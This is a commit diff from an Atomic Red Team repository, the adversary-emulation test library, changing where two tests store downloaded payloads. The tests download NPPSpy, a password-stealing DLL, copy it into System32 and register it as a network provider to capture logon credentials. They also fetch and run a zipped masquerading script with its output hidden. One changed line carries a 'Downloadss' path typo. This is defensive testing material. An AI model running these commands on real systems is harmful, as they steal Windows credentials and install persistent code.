security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

use ExternalPayloads folder (#2538)

Browse Source
This commit is contained in:
Carrie Roberts
2023-09-22 21:43:06 -06:00
committed by GitHub
parent 78204c6965
commit fc3bfecda2
2 changed files with 8 additions and 8 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1003/T1003.yaml
+1 -1
View File
@@ -66,7 +66,7 @@ atomic_tests:
Invoke-WebRequest -Uri https://github.com/gtworek/PSBits/raw/f221a6db08cb3b52d5f8a2a210692ea8912501bf/PasswordStealing/NPPSpy/NPPSPY.dll -OutFile "PathToAtomicsFolder\..\ExternalPayloads\NPPSPY.dll"
executor:
command: |-
Copy-Item "PathToAtomicsFolder\ExternalPayloads\NPPSPY.dll" -Destination "C:\Windows\System32"
Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\NPPSPY.dll" -Destination "C:\Windows\System32"
$path = Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order" -Name PROVIDERORDER
$UpdatedValue = $Path.PROVIDERORDER + ",NPPSpy"
Set-ItemProperty -Path $Path.PSPath -Name "PROVIDERORDER" -Value $UpdatedValue
atomics/T1036/T1036.yaml
+7 -7
View File
@@ -27,15 +27,15 @@ atomic_tests:
dependencies:
- description: Zip file must be present.
prereq_command: |
if (Test-Path $env:userprofile\Downloads\T1036.zip) {exit 0} else {exit 1}
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\T1036.zip") {exit 0} else {exit 1}
get_prereq_command: |
Invoke-WebRequest -OutFile "$env:userprofile\Downloads\T1036.zip" #{url}
Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\T1036.zip" #{url}
executor:
command: |-
Expand-Archive -Path $env:userprofile\Downloads\T1036.zip -DestinationPath $env:userprofile\Downloads\T1036 -Force
cd $env:userprofile\Downloads\T1036
cmd /c $env:userprofile\Downloads\T1036\README.cmd >$null 2>$null
Expand-Archive -Path "PathToAtomicsFolder\..\ExternalPayloads\T1036.zip" -DestinationPath "$env:userprofile\Downloads\T1036" -Force
cd "$env:userprofile\Downloadss\T1036"
cmd /c "$env:userprofile\Downloads\T1036\README.cmd" >$null 2>$null
cleanup_command: |-
taskkill /IM Calculator.exe /f >$null 2>$null
Remove-Item $env:userprofile\Downloads\T1036 -recurse -ErrorAction Ignore
name: powershell
Remove-Item "$env:userprofile\Downloads\T1036" -recurse -ErrorAction Ignore
name: powershell